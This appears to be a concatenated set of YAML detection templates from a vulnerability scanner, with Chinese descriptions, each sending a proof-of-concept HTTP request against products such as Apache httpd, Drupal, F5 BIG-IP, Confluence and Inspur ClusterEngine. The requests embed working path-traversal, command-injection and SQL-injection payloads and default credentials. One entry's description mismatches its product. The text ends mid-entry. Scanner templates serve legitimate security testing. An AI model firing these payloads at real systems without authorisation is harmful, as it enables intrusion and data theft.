/core/plugins/exploits/Apache_Flink_Upload_RCE.yaml: -------------------------------------------------------------------------------- 1 | app: Apache-Flink 2 | query: body:"Apache Flink Dashboard" 3 | meta: 4 | name: Apache Flink Upload RCE 5 | level: 4 6 | tags: 7 | - remote_code_execution 8 | description: Apache Flink是一个用于分布式流和批处理数据的开放源码平台。Flink的核心是一个流数据流引擎,它为数据流上的分布式计算提供数据分发、通信和容错功能。Flink在流引擎之上构建批处理,覆盖本地迭代支持、托管内存和程序优化。近日有安全研究人员发现apache 9 | flink允许上传任意的jar包从而导致远程代码执行。 10 | homepage: https://flink.apache.org/ 11 | author: 一曲成殇 12 | references: https://www.cnblogs.com/tree1123/p/11933285.html 13 | solution: 建议用户关注Apache Flink官网,及时获取该漏洞最新补丁。 14 | steps: 15 | verify_steps: 16 | type: and 17 | verify: 18 | - request: 19 | method: GET 20 | path: /jars 21 | redirect: false 22 | header: [ ] 23 | params: "" 24 | response: 25 | - name: code 26 | value: "200" 27 | type: equals 28 | - name: body 29 | value: json 30 | type: contains 31 | create_at: "2021-11-08 21:23:08" 32 | -------------------------------------------------------------------------------- /core/plugins/exploits/Apache_Kylin的未授权配置泄露漏洞.yaml: -------------------------------------------------------------------------------- 1 | app: Apache Kylin 2 | query: body:"Apache Kylin" 3 | meta: 4 | name: Apache Kylin的未授权配置泄露漏洞 5 | level: 4 6 | tags: 7 | - information_leakage 8 | description: Apache Kylin 有一个restful api会在没有认可认证的情况下暴露配置信息,攻击者可利用该漏洞获取系统敏感信息。 9 | homepage: http://kylin.apache.org/cn/download/ 10 | author: 一曲成殇 11 | references: https://v2.s.tencent.com/research/bsafe/1156.html 12 | solution: |- 13 | 升级到安全版本,或执行以下缓解措施: 14 | 编辑 "$KYLIN_HOME/WEB-INF/classes/kylinSecurity.xml"; 15 | 删除下列行 ""; 16 | 重启 Kylin实例以使其生效。 17 | steps: 18 | verify_steps: 19 | type: and 20 | verify: 21 | - request: 22 | method: GET 23 | path: /kylin/api/admin/config 24 | redirect: false 25 | header: [ ] 26 | params: "" 27 | response: 28 | - name: body 29 | value: config 30 | type: contains 31 | - name: code 32 | value: "200" 33 | type: equals 
34 | create_at: "2021-11-05 22:26:52" 35 | -------------------------------------------------------------------------------- /core/plugins/exploits/Apache_Ofbiz_XMLRPC_RCE漏洞CVE-2020-9496.yaml: -------------------------------------------------------------------------------- 1 | app: Apache OFBiz 2 | query: body:"ofbiz" 3 | meta: 4 | name: Apache Ofbiz XMLRPC RCE漏洞(CVE-2020-9496) 5 | level: 4 6 | tags: 7 | - remote_code_execution 8 | description: Apache ofbiz 存在反序列化漏洞,攻击者 通过 访问未授权接口,构造特定的xmlrpc http请求,可以造成远程代码执行的影响。 9 | homepage: http://ofbiz.apache.org/ 10 | author: 一曲成殇 11 | references: https://www.cnblogs.com/ph4nt0mer/p/13576739.html 12 | solution: 1、建议升级至最新版本 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: POST 19 | path: /webtools/control/xmlrpc 20 | redirect: true 21 | header: 22 | - Content-Type: application/xml 23 | params: ProjectDiscoverydwisiswant0 24 | response: 25 | - name: body 26 | value: No such service 27 | type: contains 28 | - name: code 29 | value: "200" 30 | type: equals 31 | create_at: "2021-11-08 21:30:11" 32 | -------------------------------------------------------------------------------- /core/plugins/exploits/Apache目录穿越漏洞_CVE-2021-41773.yaml: -------------------------------------------------------------------------------- 1 | app: Apache 2 | query: header:"apache" 3 | meta: 4 | name: Apache目录穿越漏洞 CVE-2021-41773 5 | level: 4 6 | tags: 7 | - path_traversal 8 | description: 根据发布的安全公告,该问题 (CVE-2021-41773) 可能允许路径遍历和随后的文件泄露。路径遍历问题允许未经授权的人访问 Web 9 | 服务器上的文件,方法是欺骗 Web 服务器或在其上运行的 Web 应用程序返回存在于 Web 根文件夹之外的文件。 10 | homepage: https://httpd.apache.org/ 11 | author: 一曲成殇 12 | references: https://mp.weixin.qq.com/s?src=11×tamp=1636121508&ver=3418&signature=e0tUPf*brAkQNYPZ0PkuM5RFY6csTt7zYhTNkUmzx0qaYw3sktdd78KkJ0TZtHYp*leXRZZZUsZ15HbQjwipqpV0kmm8mvGfcsUHfhtfPBgbxQdufrBBdKLe*PtyRveN&new=1 13 | solution: |+ 14 | 升级至2.4.50版本 15 | steps: 16 | verify_steps: 17 | type: and 18 | verify: 19 | - request: 20 | method: GET 21 
| path: /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 22 | redirect: false 23 | header: [ ] 24 | params: "" 25 | response: 26 | - name: code 27 | value: "200" 28 | type: equals 29 | - name: body 30 | value: /sbin/ 31 | type: contains 32 | create_at: "2021-11-05 22:18:40" 33 | -------------------------------------------------------------------------------- /core/plugins/exploits/Aspcms_backend_leak.yaml: -------------------------------------------------------------------------------- 1 | app: aspcms 2 | query: body:"aspcms" 3 | meta: 4 | name: Aspcms backend leak 5 | level: 4 6 | tags: 7 | - information_leakage 8 | description: '-' 9 | homepage: http://www.aspcmswang.com/ 10 | author: 一曲成殇 11 | references: '' 12 | solution: 升级版本 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: GET 19 | path: /plug/oem/AspCms_OEMFun.asp 20 | redirect: true 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: code 25 | value: "200" 26 | type: equals 27 | - name: body 28 | value: username 29 | type: contains 30 | create_at: "2021-11-05 22:41:06" 31 | -------------------------------------------------------------------------------- /core/plugins/exploits/Atlassian Jira 信息泄露漏洞 CVE-2020-14181.yaml: -------------------------------------------------------------------------------- 1 | app: Atlassian Jira 2 | query: app:"Atlassian Jira" 3 | meta: 4 | name: Atlassian Jira 信息泄露漏洞 CVE-2020-14181 5 | level: 3 6 | tags: 7 | - ultra_vires 8 | description: Jira存在一个未授权访问漏洞,未授权的用户可以通过一个api接口直接查询到某用户名的存在情况,该接口不同于CVE-2019-8446和CVE-2019-3403的接口,是一个新的接口。如果Jira暴露在公网中,未授权用户就可以直接访问该接口爆破出潜在的用户名。 9 | homepage: https://ones.ai/ 10 | author: Administrator 11 | references: https://blog.csdn.net/xuandao_ahfengren/article/details/115003863 12 | solution: 升级到安全版本 13 | steps: 14 | variable: 15 | - r1: randomLowercase(5) 16 | verify_steps: 17 | type: and 18 | verify: 19 | - request: 20 | method: POST 21 | path: /secure/ViewUserHover.jspa?username={{r1}} 22 | redirect: true 
23 | header: [ ] 24 | params: "" 25 | response: 26 | - name: code 27 | value: "200" 28 | type: equals 29 | - name: body 30 | value: '{{r1}}' 31 | type: contains 32 | create_at: "2022-05-23 11:05:57" 33 | -------------------------------------------------------------------------------- /core/plugins/exploits/Atlassian_Confluence_信息泄露漏洞.yaml: -------------------------------------------------------------------------------- 1 | app: Atlassian Confluence 2 | query: app:"Atlassian Confluence" 3 | meta: 4 | name: Atlassian Confluence 信息泄露漏洞 5 | level: 3 6 | tags: 7 | - information_leakage 8 | description: AtlassianConfluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。该软件可实现团队成员之间的协作和知识共享。AtlassianConfluence5.8.17之前版本中存在安全,该漏洞源于spaces/viewdefaultdecorator.action和admin/viewdefaultdecorator.action文件没有充分过滤‘decoratorName’参数。远程攻击者可利用该漏洞读取配置文件。 9 | homepage: https://www.atlassian.com/software/confluence 10 | author: 一曲成殇 11 | references: https://www.anquanke.com/vul/id/1150798 12 | solution: 升级系统版本 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: GET 19 | path: /spaces/viewdefaultdecorator.action?decoratorName 20 | redirect: false 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: body 25 | value: confluence-init.properties 26 | type: contains 27 | - name: code 28 | value: "200" 29 | type: equals 30 | create_at: "2021-11-06 18:17:14" 31 | -------------------------------------------------------------------------------- /core/plugins/exploits/CVE-2018-1000110 用户枚举.yaml: -------------------------------------------------------------------------------- 1 | app: Jenkins 2 | query: app:"Jenkins" 3 | meta: 4 | name: CVE-2018-1000110 用户枚举 5 | level: 3 6 | tags: 7 | - enumeration 8 | description: Git Plugin是使用在其中的一个版本控制插件。CloudBees Jenkins Git Plugin 3.7.0及之前版本中的GitStatus.java文件存在安全漏洞。攻击者可利用该漏洞获取节点和用户列表。 9 | homepage: https://www.jenkins.io/ 10 | author: 一曲成殇 11 | references: https://www.freebuf.com/news/242764.html 12 | solution: 升级软件版本 
13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: GET 19 | path: /search/?q=a 20 | redirect: false 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: body 25 | value: Search for 'a' 26 | type: contains 27 | create_at: "2022-04-27 14:34:57" 28 | -------------------------------------------------------------------------------- /core/plugins/exploits/CVE-2021-41277_Metabase_任意文件读取.yaml: -------------------------------------------------------------------------------- 1 | app: Metabase 2 | query: app:"Metabase" 3 | meta: 4 | name: CVE-2021-41277 Metabase 任意文件读取 5 | level: 4 6 | tags: 7 | - file_include 8 | description: metabase 是一个简单、开源的数据分析平台。在受影响的版本中,自定义 GeoJSON 地图(admin->settings->maps->custom maps->add a map)操作缺少权限验证,攻击者可通过该漏洞获得敏感信息。 9 | homepage: https://www.metabase.com/ 10 | author: 一曲成殇 11 | references: https://nosec.org/home/detail/4909.html 12 | solution: 参考漏洞影响范围,及时升级至最新安全版本:https://github.com/metabase/metabase 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: GET 19 | path: /api/geojson?url=file:/etc/passwd 20 | redirect: false 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: body 25 | value: /sbin:/ 26 | type: contains 27 | create_at: "2021-11-24 10:18:55" 28 | -------------------------------------------------------------------------------- /core/plugins/exploits/China_Mobile_Yu_routed_the_login_bypass.yaml: -------------------------------------------------------------------------------- 1 | app: 中移禹路由器 2 | query: body:"中移" 3 | meta: 4 | name: China_Mobile_Yu_routed_the_login_bypass 5 | level: 4 6 | tags: 7 | - ultra_vires 8 | description: "" 9 | homepage: https://prismx.io/ 10 | author: Administrator 11 | references: "" 12 | solution: "" 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: GET 19 | path: /simple-index.asp 20 | redirect: true 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: body 25 | value: 无线密码 26 
| type: contains 27 | create_at: "2022-05-23 11:14:09" 28 | -------------------------------------------------------------------------------- /core/plugins/exploits/Citrix_Cve-2020-8191-XSS.yaml: -------------------------------------------------------------------------------- 1 | app: Citrix 2 | query: app:"Citrix" 3 | meta: 4 | name: Citrix Cve-2020-8191-XSS 5 | level: 3 6 | tags: 7 | - xss 8 | description: xss 9 | homepage: https://www.citrix.com/ 10 | author: 一曲成殇 11 | references: https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/ 12 | solution: 升级固件版本 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: POST 19 | path: /menu/stapp 20 | redirect: true 21 | header: 22 | - Content-Type: application/x-www-form-urlencoded 23 | params: sid=254&pe=1,2,3,4,5&appname=&au=1&username=nsroot 24 | response: 25 | - name: body 26 | value: "121332121212" 27 | type: contains 28 | create_at: "2021-11-06 15:22:03" 29 | -------------------------------------------------------------------------------- /core/plugins/exploits/ClusterEngineV4.0 RCE (CVE-2020-21224).yaml: -------------------------------------------------------------------------------- 1 | app: ClusterEngineV4.0 2 | query: title:"TSCEV4.0" 3 | meta: 4 | name: ClusterEngineV4.0 RCE (CVE-2020-21224) 5 | level: 4 6 | tags: 7 | - remote_code_execution 8 | description: The dangerous characters in Inspur server cluster management system are unfiltered, resulting in remote command execution 9 | homepage: https://en.inspur.com/ 10 | author: Administrator 11 | references: "" 12 | solution: update 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: POST 19 | path: /login 20 | redirect: true 21 | header: 22 | - Content-Type: application/x-www-form-urlencoded 23 | params: op=login&username=peiqi`$(cat /etc/passwd)` 24 | response: 25 | - name: code 26 | value: "200" 27 | type: equals 28 | - name: body 29 | value: 
'root:x:' 30 | type: contains 31 | create_at: "2022-05-23 11:46:14" 32 | -------------------------------------------------------------------------------- /core/plugins/exploits/ClusterEngine_V4_0_Shell_cluster_RCE.yaml: -------------------------------------------------------------------------------- 1 | app: ClusterEngine V4.0 2 | query: body:"ClusterEngine V4.0" 3 | meta: 4 | name: ClusterEngine V4.0 Shell cluster RCE 5 | level: 4 6 | tags: 7 | - remote_code_execution 8 | description: Remote command execution exists in Inspur clusterengine v4.0. Attackers can obtain server permissions by sending special requests 9 | homepage: https://en.inspur.com/ 10 | author: Administrator 11 | references: "" 12 | solution: Attackers can obtain server permissions by sending special requests 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: POST 19 | path: /sysShell 20 | redirect: true 21 | header: 22 | - Content-Type: application/x-www-form-urlencoded 23 | params: op=doPlease&node=cu01&command=cat /etc/passwd 24 | response: 25 | - name: code 26 | value: "200" 27 | type: equals 28 | - name: body 29 | value: root 30 | type: contains 31 | create_at: "2022-05-23 11:19:05" 32 | -------------------------------------------------------------------------------- /core/plugins/exploits/Coremail邮件系统配置文件信息泄露.yaml: -------------------------------------------------------------------------------- 1 | app: Coremail 2 | query: body:"coremail" 3 | meta: 4 | name: Coremail邮件系统配置文件信息泄露 5 | level: 4 6 | tags: 7 | - information_leakage 8 | description: 该漏洞可造成Coremail的配置文件信息泄露,包括数据库连接的用户名、密码等敏感信息。攻击者可能会通过这些敏感信息的收集,从而进一步尝试获取权限和数据的攻击。 9 | homepage: https://www.coremail.cn/ 10 | author: 一曲成殇 11 | references: https://www.secpulse.com/archives/107611.html 12 | solution: 升级Coremail至最新版本 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: GET 19 | path: /mailsms/s?func=ADMIN:appState&dumpConfig=/ 20 | redirect: false 21 | header: [ ] 22 
| params: "" 23 | response: 24 | - name: code 25 | value: "200" 26 | type: equals 27 | - name: body 28 | value: cm_md_db 29 | type: contains 30 | create_at: "2021-11-06 21:23:31" 31 | -------------------------------------------------------------------------------- /core/plugins/exploits/D-Link AC集中管理系统默认弱口令.yaml: -------------------------------------------------------------------------------- 1 | app: D-Link AC管理系统 2 | query: title:"AC集中管理平台" 3 | meta: 4 | name: D-Link AC集中管理系统默认弱口令 5 | level: 3 6 | tags: 7 | - weak_password 8 | description: D-Link AC管理系统存在默认账号密码,可被获取敏感信息 9 | homepage: http://www.dlink.com.cn/ 10 | author: Administrator 11 | references: http://t.zoukankan.com/lanyincao-p-14714705.html 12 | solution: 更新复杂密码 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: POST 19 | path: /login.cgi 20 | redirect: true 21 | header: 22 | - Content-Type: application/x-www-form-urlencoded 23 | params: user=admin&password=admin 24 | response: 25 | - name: code 26 | value: "200" 27 | type: equals 28 | - name: body 29 | value: flag=0 30 | type: not contains 31 | create_at: "2022-05-23 10:55:55" 32 | -------------------------------------------------------------------------------- /core/plugins/exploits/DLink_CVE-2020-25078_Account_Disclosure.yaml: -------------------------------------------------------------------------------- 1 | app: D-Link 2 | query: body:"D-Link" 3 | meta: 4 | name: DLink CVE-2020-25078 Account Disclosure 5 | level: 4 6 | tags: 7 | - information_leakage 8 | description: D-Link DCS系列监控 通过访问特定的URL得到账号密码信息,攻击者通过漏洞进入后台可以获取视频监控页面 9 | homepage: http://www.dlink.com.cn/ 10 | author: 一曲成殇 11 | references: https://www.cnblogs.com/lanyincao/p/14714683.html 12 | solution: 设置接口访问白名单、升级系统版本 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: GET 19 | path: /config/getuser?index=0 20 | redirect: false 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: code 25 | value: "200" 26 | 
type: equals 27 | - name: body 28 | value: pass= 29 | type: equals 30 | create_at: "2021-11-08 22:07:13" 31 | -------------------------------------------------------------------------------- /core/plugins/exploits/Docker_Api_Unauthorized_Rce.yaml: -------------------------------------------------------------------------------- 1 | app: docker 2 | query: app:"docker" 3 | meta: 4 | name: Docker Api Unauthorized Rce 5 | level: 4 6 | tags: 7 | - remote_code_execution 8 | - ultra_vires 9 | description: 该未授权访问漏洞是因为docker remote api可以执行docker命令,从官方文档可以看出,该接口是目的是取代docker 10 | 命令界面,通过url操作docker。 11 | homepage: https://www.docker.com 12 | author: 一曲成殇 13 | references: https://blog.csdn.net/deeplearnings/article/details/77368582?utm_medium=distribute.pc_relevant.none-task-blog-2~default~baidujs_title~default-1.no_search_link&spm=1001.2101.3001.4242.2 14 | solution: 设置接口访问策略 15 | steps: 16 | verify_steps: 17 | type: and 18 | verify: 19 | - request: 20 | method: GET 21 | path: /info 22 | redirect: false 23 | header: [ ] 24 | params: "" 25 | response: 26 | - name: body 27 | value: DockerRootDir 28 | type: contains 29 | create_at: "2021-11-09 17:12:47" 30 | -------------------------------------------------------------------------------- /core/plugins/exploits/Druid_Monitor_Unauth.yaml: -------------------------------------------------------------------------------- 1 | app: Apache Druid 2 | query: protocol:"http" 3 | meta: 4 | name: Druid Monitor Unauth 5 | level: 3 6 | tags: 7 | - ultra_vires 8 | description: Druid是阿里巴巴数据库出品的,为监控而生的数据库连接池,并且Druid提供的监控功能,监控SQL的执行时间、监控Web URI的请求、Session监控,首先Druid是不存在什么漏洞的。但当开发者配置不当时就可能造成未授权访问。 9 | homepage: https://druid.apache.org/ 10 | author: 一曲成殇 11 | references: https://www.cnblogs.com/scivous/p/14003794.html 12 | solution: 设置接口访问规则 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: GET 19 | path: /druid/index.html 20 | redirect: false 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: code 25 | 
value: "200" 26 | type: equals 27 | - name: body 28 | value: DruidVersion 29 | type: contains 30 | create_at: "2021-11-08 22:32:03" 31 | -------------------------------------------------------------------------------- /core/plugins/exploits/Drupal_CVE-2014-3704-sqli.yaml: -------------------------------------------------------------------------------- 1 | app: Drupal 2 | query: body:"drupal" 3 | meta: 4 | name: Drupal CVE-2014-3704-sqli 5 | level: 4 6 | tags: 7 | - sql_injection 8 | description: Drupal 是一款用量庞大的CMS,其中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码 9 | homepage: https://www.drupal.org/ 10 | author: 一曲成殇 11 | references: https://blog.csdn.net/smli_ng/article/details/115496447 12 | solution: 升级版本 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: POST 19 | path: /?q=node&destination=node 20 | redirect: true 21 | header: [ ] 22 | params: pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 23 | or updatexml(0x23,concat(1,md5(666)),1)%23]=bob&name[0]=a 24 | response: 25 | - name: code 26 | value: "500" 27 | type: equals 28 | - name: body 29 | value: fae0b27c451c728867a567e8c1bb4e53 30 | type: contains 31 | create_at: "2021-11-08 23:04:41" 32 | -------------------------------------------------------------------------------- /core/plugins/exploits/Drupal_CVE-2018-7600_RCE.yaml: -------------------------------------------------------------------------------- 1 | app: Drupal 2 | query: body:"drupal" 3 | meta: 4 | name: Drupal CVE-2018-7600 RCE 5 | level: 4 6 | tags: 7 | - remote_code_execution 8 | description: 攻击者可以利用该漏洞执行恶意代码,导致网站完全被控制。 9 | homepage: https://www.drupal.org/ 10 | author: 一曲成殇 11 | references: https://paper.seebug.org/567/ 12 | solution: 升级系统版本 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: POST 19 | path: /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax 20 | redirect: false 21 | header: 22 | - 
Content-Type: application/x-www-form-urlencoded 23 | params: ' form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]=echo 24 | he151xx515x4' 25 | response: 26 | - name: body 27 | value: he151xx515x4 28 | type: contains 29 | create_at: "2021-11-09 21:49:04" 30 | -------------------------------------------------------------------------------- /core/plugins/exploits/Ecshop_CNVD-2020-58823-SQLI.yaml: -------------------------------------------------------------------------------- 1 | app: ECShop 2 | query: header:"ecs_id" 3 | meta: 4 | name: Ecshop CNVD-2020-58823-SQLI 5 | level: 4 6 | tags: 7 | - sql_injection 8 | description: 参数过滤不严谨导致sql注入 9 | homepage: https://www.ecshop.com/ 10 | author: 一曲成殇 11 | references: https://mp.weixin.qq.com/s/1t0uglZNoZERMQpXVVjIPw 12 | solution: 对请求参数进行过滤。 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: POST 19 | path: /delete_cart_goods.php 20 | redirect: true 21 | header: [ ] 22 | params: id=0||(updatexml(1,concat(0x7e,(select%20md5(hevcstools)),0x7e),1)) 23 | response: 24 | - name: body 25 | value: 7d41f560a1970ad115f25797dd157ff 26 | type: contains 27 | - name: code 28 | value: "200" 29 | type: equals 30 | create_at: "2021-11-09 22:26:47" 31 | -------------------------------------------------------------------------------- /core/plugins/exploits/ElasticSearch_api_未授权访问.yaml: -------------------------------------------------------------------------------- 1 | app: Elasticsearch 2 | query: body:"cluster_uuid" 3 | meta: 4 | name: ElasticSearch api 未授权访问 5 | level: 4 6 | tags: 7 | - ultra_vires 8 | description: 未授权访问导致数据信息泄露,部分版本或插件存在漏洞,严重可导致服务器被入侵 9 | homepage: https://github.com/elasticsearch/elasticsearch 10 | author: 一曲成殇 11 | references: https://blog.csdn.net/qq_32393893/article/details/105387471 12 | solution: 关闭对外访问、设置访问策略 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: GET 19 | path: /_cat 20 | 
redirect: false 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: body 25 | value: /_cat/master 26 | type: contains 27 | - name: code 28 | value: "200" 29 | type: equals 30 | create_at: "2021-11-08 17:25:33" 31 | -------------------------------------------------------------------------------- /core/plugins/exploits/F5_BIG-IP代码执行漏(CVE-2021-22986).yaml: -------------------------------------------------------------------------------- 1 | app: F5-BigIP 2 | query: app:"F5-BigIP" 3 | meta: 4 | name: F5 BIG-IP代码执行漏洞(CVE-2021-22986) 5 | level: 4 6 | tags: 7 | - remote_code_execution 8 | description: F5 BIG-IP/BIG-IQ iControl REST 未授权远程代码执行漏洞中,未经身份验证的攻击者可通过iControl REST接口,构造恶意请求,执行任意系统命令。 9 | homepage: https://www.f5.com/products/big-ip-services 10 | author: Administrator 11 | references: https://www.freebuf.com/vuls/268254.html 12 | solution: 升级至安全版本 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: POST 19 | path: /mgmt/tm/util/bash 20 | redirect: true 21 | header: 22 | - Authorization: Basic YWRtaW46QVNhc1M= 23 | - { } 24 | params: '{"command":"run","utilCmdArgs":"-c id"}' 25 | response: 26 | - name: code 27 | value: "200" 28 | type: equals 29 | - name: body 30 | value: dHN4dHMK 31 | type: contains 32 | create_at: "2022-05-23 11:57:10" 33 | -------------------------------------------------------------------------------- /core/plugins/exploits/F5_Tmui_CVE-2020-5902_RCE.yaml: -------------------------------------------------------------------------------- 1 | app: F5-BigIP 2 | query: header:"MRHSession" 3 | meta: 4 | name: F5 Tmui CVE-2020-5902 RCE 5 | level: 4 6 | tags: 7 | - remote_code_execution 8 | description: '未授权的远程攻击者通过向该页面发送特制的请求包,可以造成任意Java 代码执行。进而控制F5 BIG-IP的全部功能,包括但不限于: 9 | 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。' 10 | homepage: https://f5.com 11 | author: 一曲成殇 12 | references: https://support.f5.com/csp/article/K52145254 13 | solution: 升级版本 14 | steps: 15 | verify_steps: 16 | type: and 17 | verify: 18 | - request: 19 | 
method: POST 20 | path: /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp 21 | redirect: true 22 | header: 23 | - Content-Type: application/x-www-form-urlencoded 24 | params: fileName=%2Fetc%2Ff5-release 25 | response: 26 | - name: code 27 | value: "200" 28 | type: equals 29 | - name: body 30 | value: BIG-IP release 31 | type: contains 32 | create_at: "2021-11-10 10:04:39" 33 | -------------------------------------------------------------------------------- /core/plugins/exploits/FineReport(帆软)报表系统目录遍历漏洞.yaml: -------------------------------------------------------------------------------- 1 | app: FineReport 2 | query: app:"FineReport" 3 | meta: 4 | name: FineReport(帆软)报表系统目录遍历漏洞 5 | level: 4 6 | tags: 7 | - path_traversal 8 | description: 漏洞影响FineReport v8.0、FineReport v9.0 9 | homepage: https://gobies.org/ 10 | author: Administrator 11 | references: "" 12 | solution: 升级至安全版本 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: POST 19 | path: /WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=../../../../../../../../../../../../etc¤tUserName=admin¤tUserId=1&isWebReport=true 20 | redirect: true 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: code 25 | value: "200" 26 | type: equals 27 | - name: body 28 | value: etc/passwd 29 | type: contains 30 | create_at: "2022-05-23 13:53:04" 31 | -------------------------------------------------------------------------------- /core/plugins/exploits/Gitlab_CNVD-2021-14193_InfoLeak.yaml: -------------------------------------------------------------------------------- 1 | app: GitLab 2 | query: body:"GitLab" 3 | meta: 4 | name: Gitlab CNVD-2021-14193 InfoLeak 5 | level: 4 6 | tags: 7 | - information_leakage 8 | description: GitLab中存在Graphql接口 输入构造的数据时会泄露用户邮箱和用户名 9 | homepage: https://about.gitlab.com/ 10 | author: 一曲成殇 11 | references: https://www.cnvd.org.cn/flaw/show/CNVD-2021-14193 12 | solution: 
升级系统版本或参考https://gitlab.com/gitlab-org/gitlab/-/issues/244275 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: POST 19 | path: /api/graphql 20 | redirect: true 21 | header: 22 | - Content-Type: application/json 23 | params: '{"query":"{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }","variables":null,"operationName":null}' 24 | response: 25 | - name: body 26 | value: avatarUrl 27 | type: contains 28 | - name: code 29 | value: "200" 30 | type: equals 31 | create_at: "2021-11-09 17:28:41" 32 | -------------------------------------------------------------------------------- /core/plugins/exploits/HIKVISION 视频编码设备接入网关 任意文件下载.yaml: -------------------------------------------------------------------------------- 1 | app: Hikvision 2 | query: title:"视频编码设备接入网关" 3 | meta: 4 | name: HIKVISION 视频编码设备接入网关 任意文件下载 5 | level: 3 6 | tags: 7 | - file_read 8 | description: 海康威视视频接入网关系统在页面/serverLog/downFile.php的参数fileName存在任意文件下载漏洞 9 | homepage: https://www.hikvision.com/cn/ 10 | author: Administrator 11 | references: "" 12 | solution: "" 13 | steps: 14 | verify_steps: 15 | type: or 16 | verify: 17 | - request: 18 | method: GET 19 | path: /serverLog/downFile.php?fileName=../web/html/serverLog/downFile.php 20 | redirect: true 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: code 25 | value: "200" 26 | type: equals 27 | - name: body 28 | value: $file_name= 29 | type: contains 30 | create_at: "2022-05-23 14:27:06" 31 | -------------------------------------------------------------------------------- /core/plugins/exploits/HanWang Time Attendance SQL injection.yaml: -------------------------------------------------------------------------------- 1 | app: HanWang Time Attendance 2 | query: title:"汉王人脸考勤管理系统" 3 | meta: 4 | name: HanWang Time Attendance SQL injection 5 | level: 4 6 | tags: 7 | - sql_injection 8 | description: HUAWEI HG659 
lib存在任意文件读取漏洞,攻击者可通过该漏洞读取任意文件。 9 | homepage: https://www.hw99.com/ 10 | author: Administrator 11 | references: "" 12 | solution: "" 13 | steps: 14 | verify_steps: 15 | type: or 16 | verify: 17 | - request: 18 | method: POST 19 | path: /Login/Check 20 | redirect: true 21 | header: 22 | - Content-type: application/x-www-form-urlencoded 23 | params: strName=admin' or 1=1--&strPwd=admin 24 | response: 25 | - name: code 26 | value: "200" 27 | type: equals 28 | - name: body 29 | value: ok 30 | type: contains 31 | create_at: "2022-05-23 14:25:14" 32 | -------------------------------------------------------------------------------- /core/plugins/exploits/JBoss-CVE-2017-12149.yaml: -------------------------------------------------------------------------------- 1 | app: JBoss 2 | query: app:"JBoss" 3 | meta: 4 | name: JBoss-CVE-2017-12149 5 | level: 4 6 | tags: 7 | - remote_code_execution 8 | description: 漏洞为java反序列化错误,存在于jboss的HttpInvoker组件中的ReadOnlyAccessFilter过滤器中,该过滤器在没有对用户输入的数据进行安全检测的情况下,对数据流进行反序列化操作,进而导致了漏洞的发生。 9 | homepage: https://www.jboss.org/ 10 | author: 一曲成殇 11 | references: https://www.cnblogs.com/7omss/p/15439985.html 12 | solution: 通过向http-invoker.sar的web.xml文件中的安全约束添加<url-pattern>/*</url-pattern>来保护对整个 http-invoker上下文的访问,不想使用http-invoker.sar可以将其删除 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: GET 19 | path: /invoker/readonly 20 | redirect: false 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: code 25 | value: "500" 26 | type: equals 27 | create_at: "2022-04-27 14:27:53" 28 | -------------------------------------------------------------------------------- /core/plugins/exploits/Jenkins未授权访问.yaml: -------------------------------------------------------------------------------- 1 | app: Jenkins 2 | query: app:"Jenkins" 3 | meta: 4 | name: Jenkins未授权访问 5 | level: 4 6 | tags: 7 | - ultra_vires 8 | description: Jenkins系统后台中可以执行系统脚本命令,(本作用是故障排除和诊断使用) 9 | homepage: https://jenkins.io/ 10 | author: 一曲成殇 11 | references:
